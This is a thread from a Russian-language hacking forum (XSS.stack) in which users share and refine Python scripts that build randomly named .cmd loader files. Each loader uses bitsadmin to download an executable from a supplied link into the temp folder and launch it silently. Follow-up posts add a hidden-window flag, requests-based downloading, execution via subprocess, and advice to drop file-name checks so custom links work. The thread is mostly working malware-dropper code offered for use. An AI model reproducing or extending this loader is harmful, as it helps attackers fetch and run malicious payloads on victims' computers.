• XSS.stack #1 – первый литературный журнал от юзеров форума

[Script] .cmd loader

Отслеживать

Guest

Премиум
Пользователь
Регистрация
31.01.2023
Сообщения
250
Решения
1
Реакции
232
Гарант сделки
1
Python: 
import random
import string
import os

def loader(link, script):
    ran = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    cmd = f"{ran}.cmd"
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return cmd, loader

link = input('Enter direct download link to your .exe file:')
script = input('Enter exact name of .exe file on link you provided:')
cmd, loader = loader(link, script)

with open(cmd, "w") as f:
    f.write(loader)

print(f"{cmd} saved to folder!!!")
 
Пожалуйста, обратите внимание, что пользователь заблокирован
A more descriptve and definitive from the source above.​
Python: 
import random
import string
import os
import requests
import argparse

# A function that generates a random string of characters for naming the .cmd file
def random_string(length):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

# A function that downloads a file from a given URL and saves it to a specified path
def download_file(url, save_path):
    # Send a GET request to the URL to download the file
    response = requests.get(url, stream=True)
    # Raise an exception if the status code of the response is not successful
    response.raise_for_status()
    # Open a file to write the downloaded content
    with open(save_path, 'wb') as f:
        # Iterate over the content of the response and write it to the file
        for chunk in response.iter_content(chunk_size=8192):
            if chunk:
                f.write(chunk)

# A function that generates a loader script for a given file URL and name
def generate_loader(link, script):
    # Generate a random string to name the .cmd file
    random_name = random_string(12)
    # Create the loader script using the file URL and name
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return f"{random_name}.cmd", loader

# Define command line arguments for the script
parser = argparse.ArgumentParser(description='Download and run a remote executable file.')
parser.add_argument('url', type=str, help='The direct download link to the .exe file')
parser.add_argument('name', type=str, help='The exact name of the .exe file on the download link')

# Parse the command line arguments
args = parser.parse_args()

# Generate a loader script for the file and save it to a .cmd file
cmd_file, loader_script = generate_loader(args.url, args.name)
with open(cmd_file, "w") as f:
    f.write(loader_script)

# Download the file from the given URL and save it to the user's Downloads folder
file_path = os.path.join(os.path.expanduser("~"), "Downloads", args.name)
download_file(args.url, file_path)

# Print a message to the user indicating that the script and file have been downloaded successfully
print(f"{cmd_file} saved to folder!!!")
print(f"{args.name} downloaded and saved to {file_path}")
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Python: 
# Download the file from the given URL and save it to the user's Downloads folder
file_path = os.path.join(os.path.expanduser("~"), "Downloads", args.name)
download_file(args.url, file_path)

# Hide the terminal window when running the .cmd file
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW

# Run the .cmd file and wait for it to complete
subprocess.call([cmd_file], startupinfo=startupinfo)


Add this source part for a NO show window flag.
 
Dynam1c сказал(а):
Python: 
import random
import string
import os

def loader(link, script):
    ran = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    cmd = f"{ran}.cmd"
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return cmd, loader

link = input('Enter direct download link to your .exe file:')
script = input('Enter exact name of .exe file on link you provided:')
cmd, loader = loader(link, script)

with open(cmd, "w") as f:
    f.write(loader)

print(f"{cmd} saved to folder!!!")

Python: 
import random
import string
import subprocess

def loader(link, script):
    ran = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    cmd = f"{ran}.cmd"
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return cmd, loader

link = input('Enter direct download link to your .exe file:')
script = input('Enter exact name of .exe file on link you provided:')
if not link.startswith("http"):
    raise ValueError("Invalid URL entered.")
if not script.endswith(".exe"):
    raise ValueError("Invalid file name entered.")
cmd, loader = loader(link, script)

with open(cmd, "w") as f:
    f.write(loader)

try:
    subprocess.run([cmd], check=True)
except subprocess.CalledProcessError as e:
    print(f"Command failed with exit code {e.returncode}.")
else:
    print(f"{cmd} saved to folder!!!")

В обновленной версии я добавил проверку ввода для URL и имени файла, создал исключения для недопустимого ввода и использовал модуль подпроцесса для выполнения команды с обработкой ошибок.
 
Vinki сказал(а):
Python: 
import random
import string
import subprocess

def loader(link, script):
    ran = ''.join(random.choices(string.ascii_letters + string.digits, k=12))
    cmd = f"{ran}.cmd"
    loader = f'''@echo off
setlocal EnableExtensions EnableDelayedExpansion
set "url={link}"
set "filePath=%temp%\\{script}"
bitsadmin /transfer "mdj" /download /priority FOREGROUND "%url%" "%filePath%"
start /B "" "%filePath%" >nul 2>&1
'''
    return cmd, loader

link = input('Enter direct download link to your .exe file:')
script = input('Enter exact name of .exe file on link you provided:')
if not link.startswith("http"):
    raise ValueError("Invalid URL entered.")
if not script.endswith(".exe"):
    raise ValueError("Invalid file name entered.")
cmd, loader = loader(link, script)

with open(cmd, "w") as f:
    f.write(loader)

try:
    subprocess.run([cmd], check=True)
except subprocess.CalledProcessError as e:
    print(f"Command failed with exit code {e.returncode}.")
else:
    print(f"{cmd} saved to folder!!!")

В обновленной версии я добавил проверку ввода для URL и имени файла, создал исключения для недопустимого ввода и использовал модуль подпроцесса для выполнения команды с обработкой ошибок.
Мне кажется проверка на endswith(.exe) лучше убрать, файл может отдаваться с сайта и кастомным линком.
А так я бы добавил скачку по http/https с помощью requests + запуск файла с помощью system / subprocess.
 
DarkBLUP сказал(а):
Мне кажется проверка на endswith(.exe) лучше убрать, файл может отдаваться с сайта и кастомным линком.
А так я бы добавил скачку по http/https с помощью requests + запуск файла с помощью system / subprocess.
Feel free to add those suggestions to the script
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх